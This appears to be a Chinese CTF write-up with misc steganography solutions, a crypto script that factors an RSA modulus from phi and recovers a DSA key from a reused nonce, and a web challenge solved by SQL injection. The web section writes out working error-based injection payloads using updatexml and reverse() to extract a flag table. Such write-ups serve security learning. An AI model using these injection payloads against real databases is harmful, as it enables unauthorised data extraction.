【Misc】签名簿
随便写点东西提交就行
【Misc】办公室爱情
doc文档里面有两个密码,白色的password,全选然后改变颜色就行,这是第一段
修改后缀名为zip,打开document.xml就是所有的文字信息,很明显有两个password:
拼接起来就是密码,猜测为wbStego4open隐写,解密出来一个文件,存着压缩包密码
解压出来是一个pptx文件,彩色的幻灯片,有规律可以发现,可以确定就是七进制转十进制,最后转成ascii码就行。
s='204a213a166a205a234a100a66a226a203a164a203a231a124a203a100a164a45a45a45a236a'
for i in s.split('a'):
print(chr(int(i,7)),end='')
flag{10ve_exCe1_!!!}
【Crypto】known_phi
给了n和phi,要求出n的分解。
known_phi.py
跑一遍可以得到n的分解,之后dsa求flag
from Crypto.Util.number import inverse, long_to_bytes, bytes_to_long
from hashlib import sha256
from math import gcd
# from math import isqrt
from random import randrange
from sage.all import is_prime
def factorize_multi_prime(N, phi):
prime_factors = set()
factors = [N]
while len(factors) > 0:
# Element to factorize.
N = factors[0]
w = randrange(2, N - 1)
i = 1
while phi % (2 ** i) == 0:
sqrt_1 = pow(w, phi // (2 ** i), N)
if sqrt_1 > 1 and sqrt_1 != N - 1:
# We can remove the element to factorize now, because we have a factorization.
factors = factors[1:]
p = gcd(N, sqrt_1 + 1)
q = N // p
if is_prime(p):
prime_factors.add(int(p))
elif p > 1:
factors.append(int(p))
if is_prime(q):
prime_factors.add(int(q))
elif q > 1:
factors.append(int(q))
# Continue in the outer loop
break
i += 1
return tuple(prime_factors)
n = 104228256293611313959676852310116852553951496121352860038971098657350022997841589403091722735802150153734050783858816709247647536393314564077002364012463220999962114186339228164032217361145009468516448617173972835797623658266515762201804936729547278758839604969469770650218191574897316410254695420895895051693
phi = 104228256293611313959676852310116852553951496121352860038971098657350022997837434645707418205268240995284026522165519145773852565112344453740579163420312890001524537570675468046604347184376661743552799809753709321949095844960227307733389258381950812717245522599433727311919405966404418872873961877021696812800
n_factors = factorize_multi_prime(n, phi)
q = 24513014442114004234202354110477737650785387286781126308169912007819
s1 = 764450933738974696530033347966845551587903750431946039815672438603
r1 = 8881880595434882344509893789458546908449907797285477983407324325035
r2 = 8881880595434882344509893789458546908449907797285477983407324325035
s2 = 22099482232399385060035569388467035727015978742301259782677969649659
# n_factors = (92128261871628241975522014503893089775204276818952562864868068434189077323911, 112949642503320513342506215562619543574731838853984060837858943255064878544009, 87835491118288540715995802690214012778910595141140880257454164067662889225787, 114034877389817517986186253205403596431234414440955842208884285396147740113161)
import itertools
for i in itertools.permutations([0,1,2,3]):
m1 = long_to_bytes(n_factors[i[0]] + n_factors[i[1]])
m2 = long_to_bytes(n_factors[i[2]] + n_factors[i[3]])
hm1 = bytes_to_long(sha256(m1).digest())
hm2 = bytes_to_long(sha256(m2).digest())
k = inverse((s1-s2),q)*(hm1-hm2) % q
x1 = (s1*k-hm1)*inverse(r1,q) % q
x2 = (s2*k-hm2)*inverse(r2,q) % q
if b'flag' in long_to_bytes(x1):
print(long_to_bytes(x1))
flag{ea16de7-1981-11ed-b58f}
【Web】djangogogo
打开题⽬点击submit
对name参数进⾏sql注⼊测试
sql语句报错了,存在sql注⼊
查看报错信息
(1064, "You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '' FROM
`Bill`.`purchase_date`))' at line 1")
后⾯的语句是
' FROM `Bill`.`purchase_date`))
尝试拼接
name=year from 1))--
回显正常,拼接成功
直接访问 name=month 给了提⽰
意思就是表名是flag,⼤概猜测字段也是flag
测试
year from (select flag from flag)))--
回显正常
sql有报错,所以直接使⽤报错注⼊了
month from (select updatexml(1, concat(1,(select flag from flag),1),1))))--
只看到了⼀半flag,回显有⻓短限制
逆向输出⼀下就好了
month from (select updatexml(1, concat(1,(select reverse(flag) from
flag),1),1))))--